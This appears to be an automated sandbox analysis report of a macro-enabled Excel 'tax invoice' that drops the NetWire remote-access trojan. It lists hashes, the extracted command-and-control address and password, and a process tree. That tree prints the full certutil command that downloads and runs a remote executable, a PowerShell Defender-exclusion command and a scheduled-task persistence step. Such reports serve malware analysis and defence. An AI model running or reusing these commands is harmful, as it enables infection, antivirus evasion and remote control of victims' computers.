Analysis
-
max time kernel
136s -
max time network
163s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
10-08-2022 17:40
Static task
static1
Behavioral task
behavioral1
Sample
TAX INVOICE 00893.xlsm
Resource
win7-20220715-en
General
-
Target
TAX INVOICE 00893.xlsm
-
Size
42KB
-
MD5
dfd371ebf737c86675d54224482f3bf3
-
SHA1
e84195e5871bfef86c18563ebe7b6ad1077f81e5
-
SHA256
e209b1e1be73d201c0cf316df426fa1e0c2b436acf2d8c269ac6694b936d839e
-
SHA512
994ba3a222532826c82081eb92ecb6d5cd57faf162fbd5e84ec1679fa13def5813b48c0f0b40044adf92a72ea9c6778c66474690635a7d0597e0f7c43b4391f2
Malware Config
Extracted
netwire
194.5.98.126:3378
-
activex_autorun
false
-
copy_executable
false
-
delete_original
false
-
host_id
HostId-%Rand%
-
keylogger_dir
%AppData%\Logs\
-
lock_executable
false
-
offline_keylogger
true
-
password
Pass@2023
-
registry_autorun
false
-
use_mutex
false
Signatures
-
NetWire RAT payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/4980-154-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/4980-157-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/4980-160-0x0000000000400000-0x0000000000433000-memory.dmp netwire -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1344 388 cmd.exe EXCEL.EXE -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
Aqrmdtmrohibrqzfihirniu.exe.exeAqrmdtmrohibrqzfihirniu.exe.exepid process 2236 Aqrmdtmrohibrqzfihirniu.exe.exe 4980 Aqrmdtmrohibrqzfihirniu.exe.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Aqrmdtmrohibrqzfihirniu.exe.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation Aqrmdtmrohibrqzfihirniu.exe.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Aqrmdtmrohibrqzfihirniu.exe.exedescription pid process target process PID 2236 set thread context of 4980 2236 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 388 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 4476 powershell.exe 4476 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4476 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 388 EXCEL.EXE 388 EXCEL.EXE 388 EXCEL.EXE 388 EXCEL.EXE 388 EXCEL.EXE 388 EXCEL.EXE 388 EXCEL.EXE 388 EXCEL.EXE 388 EXCEL.EXE 388 EXCEL.EXE 388 EXCEL.EXE 388 EXCEL.EXE -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
EXCEL.EXEcmd.exeAqrmdtmrohibrqzfihirniu.exe.exedescription pid process target process PID 388 wrote to memory of 1344 388 EXCEL.EXE cmd.exe PID 388 wrote to memory of 1344 388 EXCEL.EXE cmd.exe PID 1344 wrote to memory of 1812 1344 cmd.exe certutil.exe PID 1344 wrote to memory of 1812 1344 cmd.exe certutil.exe PID 1344 wrote to memory of 2236 1344 cmd.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 1344 wrote to memory of 2236 1344 cmd.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 1344 wrote to memory of 2236 1344 cmd.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 2236 wrote to memory of 4476 2236 Aqrmdtmrohibrqzfihirniu.exe.exe powershell.exe PID 2236 wrote to memory of 4476 2236 Aqrmdtmrohibrqzfihirniu.exe.exe powershell.exe PID 2236 wrote to memory of 4476 2236 Aqrmdtmrohibrqzfihirniu.exe.exe powershell.exe PID 2236 wrote to memory of 5092 2236 Aqrmdtmrohibrqzfihirniu.exe.exe schtasks.exe PID 2236 wrote to memory of 5092 2236 Aqrmdtmrohibrqzfihirniu.exe.exe schtasks.exe PID 2236 wrote to memory of 5092 2236 Aqrmdtmrohibrqzfihirniu.exe.exe schtasks.exe PID 2236 wrote to memory of 4980 2236 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 2236 wrote to memory of 4980 2236 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 2236 wrote to memory of 4980 2236 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 2236 wrote to memory of 4980 2236 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 2236 wrote to memory of 4980 2236 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 2236 wrote to memory of 4980 2236 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 2236 wrote to memory of 4980 2236 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 2236 wrote to memory of 4980 2236 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 2236 wrote to memory of 4980 2236 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 2236 wrote to memory of 4980 2236 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe PID 2236 wrote to memory of 4980 2236 Aqrmdtmrohibrqzfihirniu.exe.exe Aqrmdtmrohibrqzfihirniu.exe.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\TAX INVOICE 00893.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Windows\SYSTEM32\cmd.execmd /c certutil.exe -urlcache -split -f "http://192.3.194.246/ecst.exe" Aqrmdtmrohibrqzfihirniu.exe.exe && Aqrmdtmrohibrqzfihirniu.exe.exe2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\system32\certutil.execertutil.exe -urlcache -split -f "http://192.3.194.246/ecst.exe" Aqrmdtmrohibrqzfihirniu.exe.exe3⤵PID:1812
-
C:\Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exeAqrmdtmrohibrqzfihirniu.exe.exe3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\TmbJbrgFWL.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4476 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmbJbrgFWL" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA558.tmp"4⤵
- Creates scheduled task(s)
PID:5092 -
C:\Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exe"C:\Users\Admin\Documents\Aqrmdtmrohibrqzfihirniu.exe.exe"4⤵
- Executes dropped EXE
PID:4980
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a64397f81fbb634e5722c149ed96e697
SHA10066ad87360f8dc6106b6f144b68b934496a8bcb
SHA256053324b6ec3340c4f5ebca656664c30cbba089d6f0316548c66ee7594b57a6d6
SHA51269ce73eee3f4588c965dd95687a10a35fae732fbbe359b3dd2edf3ebc2ac5b22aa5b04e9b45b9b9e7d505d3047626a968777d20fa89ee6f5030b411daeb9897f
-
Filesize
642KB
MD5f9322ac00bfcc0cfce12ed4fb88d0aa1
SHA161d94897a267d53d3f3e3399345c4ecc7918295d
SHA256e1005be756be06a809c11b66b47c79ee2fba85b2870693bee2882f369f03cec7
SHA512202bcd7c5bc00a4d7a71cc73c38abfa927e2ef70b14333637ae5396cae5eb9035902a2da436efb9128d599c6a9dbdf43fed12c869a5affa2bce5ccce25d572d1
-
Filesize
642KB
MD5f9322ac00bfcc0cfce12ed4fb88d0aa1
SHA161d94897a267d53d3f3e3399345c4ecc7918295d
SHA256e1005be756be06a809c11b66b47c79ee2fba85b2870693bee2882f369f03cec7
SHA512202bcd7c5bc00a4d7a71cc73c38abfa927e2ef70b14333637ae5396cae5eb9035902a2da436efb9128d599c6a9dbdf43fed12c869a5affa2bce5ccce25d572d1
-
Filesize
642KB
MD5f9322ac00bfcc0cfce12ed4fb88d0aa1
SHA161d94897a267d53d3f3e3399345c4ecc7918295d
SHA256e1005be756be06a809c11b66b47c79ee2fba85b2870693bee2882f369f03cec7
SHA512202bcd7c5bc00a4d7a71cc73c38abfa927e2ef70b14333637ae5396cae5eb9035902a2da436efb9128d599c6a9dbdf43fed12c869a5affa2bce5ccce25d572d1